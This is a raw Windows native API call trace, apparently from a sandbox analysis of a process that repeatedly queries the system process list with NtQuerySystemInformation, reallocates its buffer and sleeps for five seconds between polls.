[0140.822] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.822] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.822] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.823] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.825] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.825] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.837] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.838] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.838] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.838] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.839] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.842] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.843] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.858] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.859] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.859] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.860] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.860] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.863] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.864] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.890] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.890] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.891] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.891] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.891] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.894] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.895] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.900] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.900] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.900] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.901] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.901] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.904] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.905] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.915] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.915] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.916] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.916] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.916] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.918] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.918] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.931] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.931] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.932] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.932] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.932] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.935] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.935] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.952] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.952] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.953] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.953] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.953] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.955] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.956] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.962] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.962] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.962] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.964] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.965] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0140.978] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0140.978] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0140.979] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0140.979] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0140.979] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0140.983] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0140.984] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.004] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.004] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.005] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.005] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.005] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.008] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.008] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.010] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.011] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.011] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.011] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.013] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.013] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.025] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.025] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.025] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.026] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.026] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.027] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.028] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.040] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.040] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.041] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.041] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.041] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.043] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.044] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.056] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.056] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.057] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.057] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.058] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.060] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.061] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.071] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.072] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.072] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.072] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.073] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.075] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.076] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.109] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.109] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.110] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.110] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.110] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.112] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.112] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.118] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.118] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.118] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.119] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.119] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.121] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.121] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.133] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.134] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.134] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.134] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.135] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.137] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.137] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.149] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.150] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.150] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.150] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.151] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.153] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.153] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.165] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.165] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.166] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.166] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e620*=0x0, ZeroBits=0x0, RegionSize=0x14e624*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e620*=0x170000, RegionSize=0x14e624*=0x20000) returned 0x0 [0141.166] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0x0 [0141.168] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14ec78, FreeType=0x8000) returned 0x0 [0141.169] NtDelayExecution (Alertable=0, Interval=0x14e644*=-50000000) returned 0x0 [0141.181] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x14e634*=0x0, ZeroBits=0x0, RegionSize=0x14e638*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0x14e634*=0x170000, RegionSize=0x14e638*=0x10000) returned 0x0 [0141.181] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x170000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x170000, ResultLength=0x0) returned 0xc0000004 [0141.182] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0x14ec74*=0x170000, RegionSize=0x14e658, FreeType=0x8000) returned 0x0 [0141.182] 